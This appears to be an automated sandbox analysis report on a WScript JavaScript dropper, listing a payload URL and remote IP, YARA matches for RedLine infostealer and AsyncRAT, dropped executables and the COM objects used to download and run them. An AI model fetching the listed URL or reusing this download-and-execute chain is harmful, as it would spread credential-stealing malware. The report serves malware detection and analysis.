                        Source: wscript.exe, 00000000.00000003.1396927667.0000015E7ECFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1400779172.0000015E7ED14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397064885.0000015E7ED0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://postutopia.net/wp-includes/images/smilies/wp.jsG
                        Source: wscript.exe, 00000000.00000003.1396927667.0000015E7ECFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1400779172.0000015E7ED14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397064885.0000015E7ED0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://postutopia.net/wp-includes/images/smilies/wp.jsW
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                        Source: unknownHTTPS traffic detected: 51.254.27.105:443 -> 192.168.2.8:49705 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NaE.exe PID: 7716, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: audio.exe PID: 7888, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: audio.exe PID: 8088, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: audio.exe PID: 568, type: MEMORYSTR

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 4.2.NaE.exe.35083c0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 8.2.audio.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 12.2.audio.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 8.0.audio.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 10.2.audio.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 3.3.wscript.exe.27d83495000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 12.0.audio.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 3.2.wscript.exe.27d83f5a630.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 4.0.NaE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 4.2.NaE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 3.3.wscript.exe.27d83495000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 10.0.audio.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 00000004.00000002.1459366756.0000000000793000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000003.00000003.1400639939.0000027D83495000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 00000008.00000002.2645719105.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: Process Memory Space: NaE.exe PID: 7716, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: Process Memory Space: NaE.exe PID: 7716, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: Process Memory Space: audio.exe PID: 7888, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: Process Memory Space: audio.exe PID: 7888, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: Process Memory Space: audio.exe PID: 8088, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: Process Memory Space: audio.exe PID: 8088, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: Process Memory Space: audio.exe PID: 568, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: Process Memory Space: audio.exe PID: 568, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_00408C604_2_00408C60
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_0040DC114_2_0040DC11
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_00407C3F4_2_00407C3F
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_00418CCC4_2_00418CCC
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_00406CA04_2_00406CA0
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_004028B04_2_004028B0
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_0041A4BE4_2_0041A4BE
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_004182444_2_00418244
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_004016504_2_00401650
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_00402F204_2_00402F20
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_004193C44_2_004193C4
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_004187884_2_00418788
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_00402F894_2_00402F89
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_00402B904_2_00402B90
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_004073A04_2_004073A0
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_022110204_2_02211020
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_022110304_2_02211030
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeCode function: 8_2_022210208_2_02221020
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeCode function: 8_2_022210308_2_02221030
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeCode function: 10_2_0067102010_2_00671020
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeCode function: 10_2_0067103010_2_00671030
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeCode function: 12_2_0222102012_2_02221020
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeCode function: 12_2_0222103012_2_02221030
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: String function: 0040E1D8 appears 44 times
                        Source: 4.2.NaE.exe.35083c0.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 8.2.audio.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 12.2.audio.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 8.0.audio.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 10.2.audio.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 3.3.wscript.exe.27d83495000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 12.0.audio.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 3.2.wscript.exe.27d83f5a630.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 4.0.NaE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 4.2.NaE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 3.3.wscript.exe.27d83495000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 10.0.audio.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 00000004.00000002.1459366756.0000000000793000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000003.00000003.1400639939.0000027D83495000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 00000008.00000002.2645719105.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: Process Memory Space: NaE.exe PID: 7716, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: Process Memory Space: NaE.exe PID: 7716, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: Process Memory Space: audio.exe PID: 7888, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: Process Memory Space: audio.exe PID: 7888, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: Process Memory Space: audio.exe PID: 8088, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: Process Memory Space: audio.exe PID: 8088, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: Process Memory Space: audio.exe PID: 568, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: Process Memory Space: audio.exe PID: 568, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 4.2.NaE.exe.3485f90.5.raw.unpack, aojoPCkCOYi3rvl9Ad.csCryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.3485f90.5.raw.unpack, aojoPCkCOYi3rvl9Ad.csCryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.3485f90.5.raw.unpack, aojoPCkCOYi3rvl9Ad.csCryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.3485f90.5.raw.unpack, aojoPCkCOYi3rvl9Ad.csCryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.3466478.7.raw.unpack, aojoPCkCOYi3rvl9Ad.csCryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.3466478.7.raw.unpack, aojoPCkCOYi3rvl9Ad.csCryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.3466478.7.raw.unpack, aojoPCkCOYi3rvl9Ad.csCryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.3466478.7.raw.unpack, aojoPCkCOYi3rvl9Ad.csCryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.50c0000.9.raw.unpack, aojoPCkCOYi3rvl9Ad.csCryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.50c0000.9.raw.unpack, aojoPCkCOYi3rvl9Ad.csCryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.50c0000.9.raw.unpack, aojoPCkCOYi3rvl9Ad.csCryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.50c0000.9.raw.unpack, aojoPCkCOYi3rvl9Ad.csCryptographic APIs: 'CreateDecryptor'
                        Source: wscript.exe, 00000000.00000002.1400375139.0000015E7EC20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp9
                        Source: classification engineClassification label: mal100.troj.evad.winJS@15/8@4/3
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
